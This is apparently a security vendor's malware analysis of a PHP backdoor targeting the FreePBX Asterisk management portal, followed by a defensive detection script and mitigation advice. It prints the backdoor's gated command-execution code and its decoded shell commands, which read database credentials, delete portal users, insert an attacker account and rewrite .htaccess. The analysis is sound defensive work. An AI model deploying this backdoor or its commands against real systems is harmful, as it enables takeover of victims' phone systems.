Backdoor Targets FreePBX Asterisk Management Portal 

Written in PHP and JavaScript, FreePBX is a web-based open-source GUI that manages Asterisk, a voice over IP and telephony server. This open-source software allows users to build custom phone systems.

During a recent investigation, I came across a simple piece of malware targeting FreePBX’s Asterisk Management portal which allowed attackers to arbitrarily add and delete users, as well as modify the website’s .htaccess file.

Let’s take a closer look at this backdoor.

PHP script

The following PHP script was found on a compromised WordPress website.

<?php
// Gate 1: the client IP must match the hard-coded address and the 'secure' parameter
// must hash to the hard-coded MD5; if so, run the shell command supplied in 'secmd'.
if ($_SERVER["REMOTE_ADDR"]=="178.162.201.166" && md5($_REQUEST['secure'])=="7f02b0ae0869cc5aa38cd7ca6c767c92"){ system($_REQUEST['secmd']); }
// Gate 2: the 'mgp' parameter must hash to a second hard-coded MD5; if so, run the command in 'c'.
if(md5($_REQUEST["mgp"])=="4f6e5768b76809bc99bf278494b5f352")
{
echo "login correct
";
echo "";
@system($_REQUEST["c"]);
echo "";

}
// Runs on every request, regardless of the gates above: the two base64 blobs decoded in the next section.
system(base64_decode("bXlzcWwg…[TRIMMED]...cqJyk7Ig=="));
system(base64_decode("ZWNobyAnT3JkZX…[TRIMMED]...hY2Nlc3M="));
?>

The malware contains a number of checks to restrict access:

  • It checks the user’s IP to ensure that it matches 178.162.201.166 (which happens to belong to a network for Leaseweb Deutschland GmbH).
  • It checks whether the user made a request with a password value that matches the provided md5 hash: if(md5($_REQUEST["mgp"])=="4f6e5768b76809bc99bf278494b5f352")

If these checks pass, the PHP executes an external shell command passed in the request: the secmd parameter for the IP-gated check, and the c parameter for the mgp-gated check.

From this sample, we can see some base64 encoded strings in the system function. Let’s take a look at what those do.

Commands concealed in base64

Once decoded, the base64 strings reveal the true behavior of the backdoor:

mysql `grep AMPDB /etc/amportal.conf|grep "USER\|PASS\|NAME"| sed 's/AMPDBUSER/a/g'|sed 's/AMPDBPASS/b/g'|sed 's/AMPDBNAME/c/g'|sed 's/a=/-u/g'|sed 's/b=/ -p/g'|sed 's/c=/ /g'|tr -d '\n'` --execute "DELETE from ampusers where username!='admin';INSERT INTO ampusers (username,password_sha1,sections) VALUES ('mgknight','33c7a4df46b1a9f7d4a4636d476849205a04c6b7','*');"

echo 'Order Deny,Allow`deny from all`<Files subdirectory/*>`    deny from all`</Files>`<FilesMatch "\..*$">` Deny from all`</FilesMatch>`<FilesMatch "(^$|index\.php|config\.php|\.(gif|GIF|jpg|jpeg|png|css|js|swf|txt|ico|ttf|svg|eot|woff|wav|mp3|aac|ogg|webm)$|bootstrap\.inc\.php)">` Allow from all`</FilesMatch>`php_value max_input_vars 5000'|tr '`' '\n'>.htaccess

The first decoded command extracts the amportal database name, database user, and password from /etc/amportal.conf and passes them to the mysql client.

The command uses the grep and sed utilities to pull the AMPDBUSER, AMPDBPASS and AMPDBNAME values out of the Asterisk amportal.conf configuration file and turn them into mysql command-line arguments. It then uses the mysql utility to execute an SQL query that deletes every user except admin from the ampusers table, followed by inserting the attackers’ own malicious user with the name mgknight, giving them access to the Asterisk management portal.

Even when no command is supplied (i.e. neither of the checks above passes), the malware still runs both decoded commands on every request: it replaces the FreePBX login credentials and rewrites the .htaccess file. The .htaccess directives specify which files should be allowed or denied access based on their names and location in the directory tree, and also set the php_value max_input_vars directive to 5000.
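As an added defender-side example (not code from the original post), the following Python scanner automates what the analysis above did by hand: it pulls every base64 string handed straight to system(), decodes it, and flags the FreePBX-specific behaviours (reading /etc/amportal.conf, touching the ampusers table, rewriting .htaccess, executing a request parameter). The sample PHP it runs against is constructed from stand-in commands, not the real blobs.

```python
import base64
import binascii
import re

# Behaviours seen in this backdoor, as (label, regex) pairs; each is checked
# against the PHP source itself and against every decoded base64 command.
INDICATORS = [
    ("reads FreePBX DB credentials", re.compile(r"/etc/amportal\.conf")),
    ("tampers with ampusers table", re.compile(r"\bampusers\b", re.I)),
    ("rewrites .htaccess", re.compile(r">\s*\.htaccess")),
    ("executes request parameter", re.compile(r"@?system\(\s*\$_REQUEST")),
]

# Matches system(base64_decode("...")) and captures the base64 payload.
B64_IN_SYSTEM = re.compile(
    r"""system\(\s*base64_decode\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")


def decode_concealed_commands(php_source: str) -> list:
    """Return the plaintext of every base64 string passed directly to system()."""
    found = []
    for blob in B64_IN_SYSTEM.findall(php_source):
        try:
            found.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            found.append("<undecodable base64: %s...>" % blob[:16])
    return found


def scan_php(php_source: str) -> dict:
    """Decode concealed commands and return the sorted list of indicator labels that fired."""
    commands = decode_concealed_commands(php_source)
    hits = set()
    for label, pattern in INDICATORS:
        if any(pattern.search(text) for text in [php_source] + commands):
            hits.add(label)
    return {"decoded": commands, "hits": sorted(hits)}


# Constructed sample: shortened stand-ins for the two decoded commands on this page,
# base64-encoded here so the example stays self-contained and offline.
_CMD_SQL = ("mysql `grep AMPDB /etc/amportal.conf` --execute "
            "\"DELETE from ampusers where username!='admin';\"")
_CMD_HTACCESS = "echo 'Order Deny,Allow' > .htaccess"
_b64 = lambda s: base64.b64encode(s.encode()).decode()
SAMPLE_PHP = (
    "<?php\n"
    "if(md5($_REQUEST['mgp'])=='<placeholder-hash>'){ @system($_REQUEST['c']); }\n"
    "system(base64_decode(\"%s\"));\n"
    "system(base64_decode(\"%s\"));\n?>" % (_b64(_CMD_SQL), _b64(_CMD_HTACCESS))
)

if __name__ == "__main__":
    print(scan_php(SAMPLE_PHP))
```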

Mitigation steps:

Backdoors are often exploited by attackers to gain unauthorized access to websites long after initial infection has occurred. In this case, the attacker’s simple PHP script provided them with all the power needed to arbitrarily add and modify users in the Asterisk Management Portal — as well as modify the site’s .htaccess file.

To mitigate risk, there are a number of steps you can take to protect your website from backdoors:

  1. Keep your software, plugins, themes and extensible components updated. Always patch to the latest version to ensure you’re protecting against known software vulnerabilities.
  2. Use strong and unique passwords for all of your accounts. That includes credentials for sFTP, database, cPanel, and admin users.
  3. Regularly scan your website for malware and backdoors. That means periodically scanning your site at the client and server level to identify any malicious code or website backdoors.
  4. Monitor your website’s logs. Check for unusual or suspicious behavior and consider using a file integrity monitoring system to identify indicators of compromise.
  5. Use a web application firewall (WAF). Firewalls can help prevent brute force, bad bots, and detect potential attacks in your environment.

And if you believe your site has been compromised or backdoored, we can help! Reach out to our support team for assistance – we can help get the malware cleaned up for you.
